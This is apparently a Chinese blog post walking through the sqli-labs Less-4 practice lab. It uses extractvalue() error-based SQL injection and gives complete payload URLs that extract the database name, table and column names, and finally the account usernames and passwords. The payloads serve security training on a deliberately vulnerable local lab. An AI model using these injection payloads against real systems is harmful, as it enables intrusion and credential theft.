0
点赞
收藏
分享

微信扫一扫

sqli-labs(Less-4) extractvalue闯关

科牛 2023-11-18 阅读 57
网络安全web安全

extractvalue() - Xpath类型函数

1. 确认注入点如何闭合的方式
在这里插入图片描述

2. 爆出当前数据库的库名

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select database()))) --+

在这里插入图片描述
3. 爆出当前数据库的表名

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1))) --+

注意:报错注入不能使用group_concat()函数直接将所有信息获取出来,只能一条一条获取,而且必须使用limit 0,1控制
在这里插入图片描述
通过不断调整limit 0,1 得到users表
在这里插入图片描述
4. 爆出表中的字段名

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))) --+

在这里插入图片描述
通过不断调整limit 0,1 得到所有的字段名id,username,password

5. 获取表中内容

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select concat(id,username,password) from users limit 0,1))) --+

在这里插入图片描述
可在concat中添加分隔符 更方便数据的获取

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select concat(id,'~',username,'~',password) from users limit 0,1))) --+

在这里插入图片描述
通过不断调整limit 0,1 即可得到全部的账号密码

举报

相关推荐

sqli-labs闯关1-5

sql数据库database

sqli-labs(Less-3)

开发语言算法

SQLi-LABS Less-25&&Less-25a

web安全学习

从零记录sqli-labs学习过程 sqli-labs Less-6

sqlweb安全安全

Sqli-Labs

springmvc流程图

SQLi-LABS Less-27到Less-28a

web安全

sqli-labs ----less-26---37--练习

数据库database

《SQLi-Labs》04. Less 23~28a

mysql性能优化数据库

sqli-labs Less-9 时间盲注

webmysql

SQL注入实例(sqli-labs/less-9)

harmonyos鸿蒙开发鸿蒙应用服务钱包服务arktsopenharmony
0 条评论